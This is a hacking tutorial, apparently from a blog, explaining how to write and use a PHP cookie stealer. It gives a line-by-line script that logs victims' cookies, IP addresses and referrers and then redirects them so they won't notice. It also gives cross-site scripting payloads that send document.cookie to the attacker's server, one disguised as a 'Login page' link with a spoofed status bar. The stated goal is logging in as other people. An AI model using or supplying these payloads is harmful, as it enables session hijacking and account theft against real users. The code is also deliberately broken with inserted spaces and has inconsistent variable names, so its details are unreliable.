Tutorial: Cookie stealer

In this tutorial I will explain what a cookiestealer is, why it is useful to have one, and even more important, how to write it!

First off all we'll have to have a webhosting and a FTP-program, like WS_FTP. (See below for links.) Before we can start be sure you're hosting supports PHP.

What is it?
A cookiestealer is a small script, written in a webbased programming language (in this case PHP). It reads a variable from the address-bar, which contains in our case the cookies, which we want to steal. Ofcourse you can add some more information, like the referrer, the IP and the date and time of the log.

Why to use it?
As you might know, most of the time, login-information is stored in cookies. So if you can make the browser think you're the one who logged in, and set the cookies, you'll be able to login as the person you defaced. How we make the browser think this, I will post later on.

Writing the stealer.
I will give you the script and after that I will explain what it does line by line. So here it is:

1 < ? php //don't type stuff after this "//". and delete the two spaces between < ? php

2 $cookie = $_GET['c];

3 $ip = getenv ('REMOTE_ADDR');

4 $date=date("j F, Y, g:i a");;

5 $referer=getenv ('HTTP_REFERER');

6 $fp = fopen('cookies.txt', 'a');

7 fwrite($fp, 'Cookie: '.$cookie.'
IP: ' .$ip. '
Date and Time: ' .$date. '
Referer: '.$referer.'


'); 8 fclose($fp);

9 header ("Location: /picture.html");

10 ?>

That's all! Well, time to explain:

1: < ? php Opening tag for php... that's just all

2: $cookie = $_GET['C']; Here the variable $cookie gets the content out of the adress, from what's behind C=[thecookie]

3: $ip = getenv ('REMOTE_ADDR'); That's the IP of the person which is redirected to our stealer.

4. $date=date("j F, Y, g:i a");; This sets the variable $date the current time and date, IMPORTANT: this is done in dutch way, so year - month - day!

5. $referer=getenv ('HTTP_REFERER'); That must be the referer, don't you think =p

6. $fp = fopen('cookies.txt', 'a'); This specifies the file which has to be rewritten with the cookie, and 'a' stands for the way of writing, in this case adding the new content to the end of the file.

7. fwrite($fp, 'Cookie: '.$cookie.'n IP: ' .$ip. 'n Date and Time: ' .$date. 'n Referer: '.$referer.'nnn'); This line writes the content to the file.

8. fclose($fp); Close the file (dûh)

9. header ("Location: /picture.html");
send the visitor to another page, so he wont notice that the cookie is logged... ofcourse picture.html can be everything.

10. ?> The closing tag for a php-script

Now we have to know how to make the link:
This must be the most basic version:

w indow .l ocation('http://www.mysite/c ookie.p hp?c=' + d ocument.c ookie)
//change the two "s cript"s above to "script" this is because blogger doesnt accept html commands like them in a post. delete the space between window and .location. delete the space between p and hp, between l and ocation, betwn d and ocument, between c and ookie, w and indow//

But when doing it hardcore, you can do it this way:
/*
< a
h ref=”http://www.example.com/index.php?page= ript>document.location.replace('http://www.mysite.com/log
.p hp?c=' +document.cookie);” onmouseover=”window.status='http://www.example.com
/login.php'; return true” onmouseout=”window.status=''; return true” >Login page< / a>//delete space between 'h' and 'ref', '/' and 'a', 's' and 'cript' , 'p' and 'hp'
*/
Be creative!

IMPORTANT:
Last but not least, don't forget to create a cookies.txt on your server and chmod it 666...
Links:

http://www.php.net // all about PHP
http://www.ipswitch.com // WS_FTP
http://www.google.com // Use it goddamnit!
http://www.bothack.blogspot.com // Just get back here.


Die Dulci Fruere